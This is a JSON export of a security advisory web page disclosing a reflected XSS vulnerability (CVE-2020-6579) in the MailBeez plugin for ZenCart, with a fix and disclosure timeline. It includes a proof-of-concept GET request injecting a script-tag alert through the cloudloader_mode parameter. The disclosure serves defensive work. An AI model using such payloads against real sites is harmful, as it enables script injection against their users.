{"id":16653,"date":"2021-07-07T15:53:53","date_gmt":"2021-07-07T13:53:53","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2019-0070\/"},"modified":"2021-07-19T14:13:56","modified_gmt":"2021-07-19T12:13:56","slug":"usd-2019-0070","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2019-0070\/","title":{"rendered":"usd-2019-0070"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

usd-2019-0070 | MailBeez Plugin for ZenCart \/ v3.9.21<\/span><\/h1>\n

<\/span>
Advisory ID<\/strong>: usd-2019-0070<\/span>
CVE Number<\/strong>: CVE-2020-6579<\/span>
Affected Product<\/strong>: MailBeez Plugin for ZenCart<\/span>
Affected Version<\/strong>: v3.9.21<\/span>
Vulnerability Type<\/strong>: XSS<\/span>
Security Risk<\/strong>: Medium<\/span>
Vendor URL<\/strong>: https:\/\/www.mailbeez.com\/<\/a><\/span>
Vendor Status<\/strong>: Fixed<\/span><\/p>\n

<\/h3>\n

Description<\/h3>\n

A reflected XSS attack (or non-persistent attack) occurs when a malicious script is reflected off of a web application to the victim\u2019s browser. The attack is typically delivered via email or a web site and activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts. The <\/span>cloudloader_mode<\/code> can be used for reflected XSS attacks. Two files are vulnerable for this attack. Vulnerable Code can be found at <\/span>\/mailhive\/cloudbeez\/cloudloader.php<\/code> and <\/span>\/mailhive\/cloudbeez\/cloudloader_core.php<\/code>.<\/span><\/p>\n

<\/span><\/p>\n

Proof of Concept (PoC)<\/h3>\n

Send the following request:<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]GET \/mailhive\/cloudbeez\/cloudloader_core.php?cloudloader_mode=foooo%27;%3Cscript%3Ealert(%27XSS%27)%3C\/script%3E HTTP\/1.1
\nHost: cvehunt.de
\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0
\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8
\nAccept-Language: en-US,en;q=0.5
\nAccept-Encoding: gzip, deflate
\nCookie: zenid=rjlns1c0rvet35tc7qouf5g1jd; OCSESSID=7b8cbd4291f31225b537e2c2d9; language=en-gb; currency=USD
\nConnection: close
\nUpgrade-Insecure-Requests: 1<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

Response:<\/span><\/p>\n

[\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2021\/07\/usd-security-advisories-usd-2019-0070-1.jpg\" title_text=\"usd-security-advisories-usd-2019-0070-1\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"27px||43px||false|false\"][\/et_pb_image][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

\n
\n

Fix<\/h3>\n
\n
\n
\n

Make sure to encode the user supplied input.<\/p>\n<\/div>\n<\/div>\n<\/div>\n

<\/h3>\n

Timeline<\/h3>\n
    \n
  • 2019-12-31 Gerbert Roitburd and Markus Schneider discover vulnerability in a Penetration Test<\/li>\n
  • 2020-02-13 First contact with vendor<\/li>\n
  • 2020-02-24 Vendor releases version v3.9.22 of the plugin that fixes the issue<\/li>\n
  • 2020-04-29 Security advisory released<\/li>\n<\/ul>\n

    <\/h3>\n

    Credits<\/h3>\n

    This security vulnerability was discovered by Gerbert Roitburd and Markus Schneider of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n

    [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"

    usd-2019-0070 | MailBeez Plugin for ZenCart \/ v3.9.21 Advisory ID: usd-2019-0070CVE Number: CVE-2020-6579Affected Product: MailBeez Plugin for ZenCartAffected Version: v3.9.21Vulnerability Type: XSSSecurity Risk: MediumVendor URL: https:\/\/www.mailbeez.com\/Vendor Status: Fixed Description A reflected XSS attack (or non-persistent attack) occurs when a malicious script is reflected off of a web application to the victim\u2019s browser. The attack is […]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16653","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16653","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16653"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16653\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16653"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}